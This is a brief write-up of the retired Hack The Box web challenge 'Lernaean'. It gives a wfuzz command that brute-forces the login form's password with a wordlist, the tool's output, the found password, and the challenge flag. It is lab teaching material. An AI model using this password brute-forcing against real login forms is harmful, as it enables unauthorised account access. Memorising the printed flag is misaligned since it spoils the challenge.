2 minutes
Lernaean
Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.
Challenge info ¶
Lernaean [by Arrexel]
Our target is not very good with computers. Try and guess their password to see if they may be hiding anything!
The challenge ¶
We visit the webpage and notice there’s a login form and some hints about bruteforcing.

We use wfuzz to bruteforce the login form.
By passing a ‘known-incorrect’ value and the --hw=BBB
parameters, we can automatically filter out incorrect attempts, giving us much cleaner results.
$ wfuzz -c -v -z file,/usr/share/wordlists/dirb/big.txt --hw=BBB -d password=FUZZ{test} http://docker.hackthebox.eu:42049/
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://docker.hackthebox.eu:42049/
Total requests: 20470
==================================================================================================================================================
ID C.Time Response Lines Word Chars Server Redirect Payload
==================================================================================================================================================
000000002: 0.093s 200 17 L 38 W 474 Ch Apache/2.4.18 (Ubuntu) "test"
000010743: 0.037s 200 19 L 44 W 618 Ch Apache/2.4.18 (Ubuntu) "leonardo"
Total time: 81.72543
Processed Requests: 20470
Filtered Requests: 20468
Requests/sec.: 250.4728
We now login using leonardo
as a password.
We are redirected to http://docker.hackthebox.eu:45029/noooooooope.html
and are greeted with a rather bullyish message.

The flag ¶
Capturing the browser request using a proxy, or even simply using the browser’s Developer Tools, will allow us to view the browser response to the login action and reveals the flag.
Make sure you check ‘Persist logs’.

Et voilà :)
HTB{l1k3_4_b0s5_s0n}